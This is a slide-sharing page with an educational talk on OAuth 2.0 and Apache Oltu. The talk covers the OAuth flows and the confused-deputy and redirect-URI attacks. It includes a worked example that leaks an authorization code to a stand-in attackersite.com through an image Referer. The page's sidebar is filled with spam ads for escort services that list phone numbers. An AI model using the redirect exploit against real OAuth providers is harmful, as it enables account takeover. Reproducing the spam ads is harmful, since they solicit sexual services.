Stateless authentication for microservices applications - JavaLand 2015Stateless authentication for microservices applications - JavaLand 2015
Stateless authentication for microservices applications - JavaLand 2015
 
Integrating WordPress With Web APIs
Integrating WordPress With Web APIsIntegrating WordPress With Web APIs
Integrating WordPress With Web APIs
 
Chrome Dev Summit 2020 Extended: Improve Your Web Authentication Security
Chrome Dev Summit 2020 Extended: Improve Your Web Authentication SecurityChrome Dev Summit 2020 Extended: Improve Your Web Authentication Security
Chrome Dev Summit 2020 Extended: Improve Your Web Authentication Security
 
I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)
 
Some OAuth love
Some OAuth loveSome OAuth love
Some OAuth love
 
Integrating WordPress With Web APIs
Integrating WordPress With Web APIsIntegrating WordPress With Web APIs
Integrating WordPress With Web APIs
 
Authorization with oAuth
Authorization with oAuthAuthorization with oAuth
Authorization with oAuth
 
O auth how_to
O auth how_toO auth how_to
O auth how_to
 
OAuth
OAuthOAuth
OAuth
 
OAuth 2 at Webvisions
OAuth 2 at WebvisionsOAuth 2 at Webvisions
OAuth 2 at Webvisions
 
I Don't Care About Security
I Don't Care About Security I Don't Care About Security
I Don't Care About Security
 
Securing APIs using OAuth 2.0
Securing APIs using OAuth 2.0Securing APIs using OAuth 2.0
Securing APIs using OAuth 2.0
 
The Current State of OAuth 2
The Current State of OAuth 2The Current State of OAuth 2
The Current State of OAuth 2
 

Dernier

Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Sheetaleventcompany
 
Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.soniya singh
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxellan12
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Servicegwenoracqe6
 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...tanu pandey
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024APNIC
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGAPNIC
 
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...Delhi Call girls
 
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night StandHot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Standkumarajju5765
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024APNIC
 
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)Delhi Call girls
 
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersMoving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersDamian Radcliffe
 
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...Call Girls in Nagpur High Profile
 
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...Neha Pandey
 
INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.
INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.
INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.CarlotaBedoya1
 
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝soniya singh
 

Dernier (20)

@9999965857 🫦 Sexy Desi Call Girls Laxmi Nagar 💓 High Profile Escorts Delhi 🫶
@9999965857 🫦 Sexy Desi Call Girls Laxmi Nagar 💓 High Profile Escorts Delhi 🫶@9999965857 🫦 Sexy Desi Call Girls Laxmi Nagar 💓 High Profile Escorts Delhi 🫶
@9999965857 🫦 Sexy Desi Call Girls Laxmi Nagar 💓 High Profile Escorts Delhi 🫶
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
 
Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
 
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
 
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOG
 
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
 
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night StandHot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
 
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
 
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
Russian Call Girls in %(+971524965298 )# Call Girls in DubaiRussian Call Girls in %(+971524965298 )# Call Girls in Dubai
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
 
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersMoving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
 
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
 
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
 
INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.
INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.
INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.
 
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
 

OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu

  • 1. OAuth Hacks
 A Gentle Introduction to OAuth 2.0 and Apache Oltu 
 Antonio Sanso (@asanso) Software Engineer Adobe Research Switzerland
  • 2. Who is this guy, BTW? eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ 9.eyJhdWQiOiJjb25uZWN0MjAxNCIsIm lzcyI6ImFzYW5zbyIsInN1YiI6ImFzYW5 zbyIsImV4cCI6MTQwMzYwMTU1OSwi aWF0IjoxNDAzNjAxNTU5fQ.9- MaGUiPg07ezuP9yAOaVLETQH6HMO pfoGwg_c0-PDw
  • 3. Who is this guy, BTW? {  Software Engineer Adobe Research Switzerland {  VP (Chair) Apache Oltu (OAuth Protocol Implementation in Java) {  Committer and PMC Member for Apache Sling {  Google Security Hall of Fame, Facebook Security Whitehat, GitHub Security Bug Bounty
  • 4. My (little) contribution to OAuth Not an RFC, still in the draft phase
  • 5. Agenda { Introducing OAuth 2.0 { The “OAuth dance” { Introducing Apache Oltu { Implementing OAuth 2.0 { OAuth 2.0 Implementation Vulnerabilities { OAuth 2.0 server to server ★
  • 6. Why OAuth? Several web sites offer you the chance to import the list of your contacts. It ONLY requires you giving your username and password. HOW NICE
  • 7. A bit of history – OAuth 1.0a
  • 8. A bit of history – OAuth 2.0 2 years X
  • 9. The good { OAuth 2.0 is easier to use and implement (compared to OAuth 1.0) { Wide spread and continuing growing { Short lived Tokens { Encapsulated Tokens * Image taken from the movie "The Good, the Bad and the Ugly"
  • 10. The bad { No signature (relies solely on SSL/TLS ), Bearer Tokens { No built-in security { Can be dangerous if used from not experienced people { Burden on the client * Image taken from the movie "The Good, the Bad and the Ugly"
  • 11. The ugly { Too many compromises. Working group did not take clear decisions { Oauth 2.0 spec is not a protocol, it is rather a framework - RFC 6749 :The OAuth 2.0 Authorization Framework { Not interoperable - from the spec: “…this specification is likely to produce a wide range of non-interoperable implementations.” !! { Mobile integration (web views) { A lot of FUD * Image taken from the movie "The Good, the Bad and the Ugly"
  • 12. So what should I use? { No many alternatives { OAuth 1.0 does not scale (and it is complicated)
  • 13. OAuth flows { Authorization Code Grant (aka server side flow) ✓ { Implicit Grant (aka Client side flow) ✓ { Resource Owner Password Credentials Grant { Client Credentials Grant
  • 14. OAuth Actors {  Resource Owner (Alice) { Client (Bob, worker at www.printondemand.biz ) { Server (Carol from Facebook) www.printondemand.biz
  • 15. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Login and authorize 4. Here the Authz Code 5. Here we go Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9 ★
  • 16. Traditional OAuth “dance” #2- client side flow 1616 www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go ★
  • 17. Apache Oltu { 2010 - Project enters incubation with the name of Apache Amber { 2013 - Amber graduates from the incubator with the name Apache Oltu { OAuth protocol implementation in Java (OAuth client and server) { It also covers others "OAuth family" related implementations such as JWT, JWS
  • 18. How difficult is to implement OAuth ? OAuth client OAuth server
  • 19. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ GET /oauth/authorize?response_type=code&! client_id=bfq5abhdq4on33igtmd74ptrli-9rci_8_9&! scope=profile&state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251! &redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! HTTP/1.1! Host: server.oltu.com! ! Authorization Server
  • 20. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ HTTP/1.1 302 Found! Location: https://www.printondemand.biz/callback? code=SplxlOBeZQQYbYS6WxSbIA! ! ! Authorization Server
  • 21. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ Authorization Server
  • 22. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server POST /oauth/token HTTP/1.1! Host: server.oltu.com! Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW ! Content-Type: application/x-www-form-urlencoded! ! grant_type=authorization_code&code=SplxlOBeZQQYbYS6WxSbIA! &state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251&! redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! ! !
  • 23. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server HTTP/1.1 200 OK! Content-Type: application/json;charset=UTF-8! ! {! "access_token":"1017097752d5f18f716cc90ac8a5e4c2a9ace6b9”,! "expires_in":3600 ! }! !
  • 24. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server
  • 25. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Resource Server GET /profile/me HTTP/1.1! Host: server.oltu.com! Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9! !
  • 26. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Resource Server
  • 28. Scalable OAuth Server { derive encryption key using salt1 { derive mac key using salt2 { generate random iv { encrypt. then mac(salt1 + iv + data) { transmit salt1, salt2 iv and encrypted
  • 31. OAuth entication orization { OAuth 2.0 is NOT an authentication protocol. It is an access delegation protocol. { It can-be-used as an authentication protocol { BUT HANDLE WITH CARE ★
  • 32. Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go 7. www.printondemand.biz uses the profile information from Facebook to log in N.B. www.printondemand.biz does not have any security. They have not Authenticated the User! * Image taken from the movie "The Devil Wears Prada"
  • 33. Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go What does this tell us ? That www.printondemand.biz authenticated us, given an Access Token 7. AUTHENTICATED * Image taken from the movie "The Devil Wears Prada"
  • 34. Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token a. Here we go 3. Login and authorize 4. Here the Access Token 5. Here we go www.dosomething.biz b. Give me the profile information, here is the Access Token c. AUTHENTICATED * Image taken from the movie "The Devil Wears Prada" ★
  • 35. ✔ ✔ ✗ ✗ ✗ ✗ ✗ Attack #2 – Exploit the redirect URI aka “Lassie Come Home” * Image taken from the movie “Lassie Come Home" 1. I want an Access Token 2. Printondemand wants an Access Token GET /oauth/authorize? response_type=code&client_id=213814055461514&redirect_uri=https%3A%2F %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback! Host: https://graph.facebook.com! ✔
  • 36. Attack #2 – Exploit the redirect URI aka “Lassie Come Home” 1. I want an Access Token 2. Printondemand wants an Access Token GET /oauth/authorize? response_type=code&client_id=213814055461514&redirect_uri=https%3A%2F %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback%2F..../..../..../ asanso/a2f05bb7e38ba6af88f8! Host: https://graph.facebook.com! * Image taken from the movie “Lassie Come Home" ✔
  • 37. Attack #2 – Exploit the redirect URI aka “Lassie Come Home” 1. I want an Access Token 2. Printondemand wants an Access Token HTTP/1.1 302 Found! Location: https://gist.github.com/auth/asanso/! a2f05bb7e38ba6af88f8?code=SplxlOBeZQQYbYS6WxSbIA! * Image taken from the movie “Lassie Come Home" ...! <img src="http://attackersite.com/"> ! ...! ! https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! GET / HTTP/1.1! Host: attackersite.com! Referer: https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! ?code=SplxlOBeZQQYbYS6WxSbIA! !
  • 38. OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 0. Generate key pair and upload public key Your application (OAuth Client) calls OAuth Server APIs on behalf of the service account, and user consent (Resource Owner) is not required (no human interaction). Why? How? 3. Here the Access Token 4. Use Access Token to call APIs ★ Register client OAuth Server 2 Server Flow
  • 39. OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 3. Here the Access Token 4. Use Access Token to call APIs OAuth Server 2 Server Flow
  • 40. OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 3. Here the Access Token 4. Use Access Token to call APIs OAuth Server 2 Server Flow ! curl -d 'grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt bearer! &assertion=ASSERTION' https://accounts.google.com/o/oauth2/token ! !
  • 41. References { OAuth 2.0 web site - http://oauth.net/2/ { OAuth 2.0 - http://tools.ietf.org/html/rfc6749 { Bearer Token - http://tools.ietf.org/html/rfc6750 { Apache Oltu - http://oltu.apache.org/ { http://oauth.net/articles/authentication/ { JWT - http://tools.ietf.org/html/draft-ietf-oauth-json-web-token-23 { http://intothesymmetry.blogspot.ch/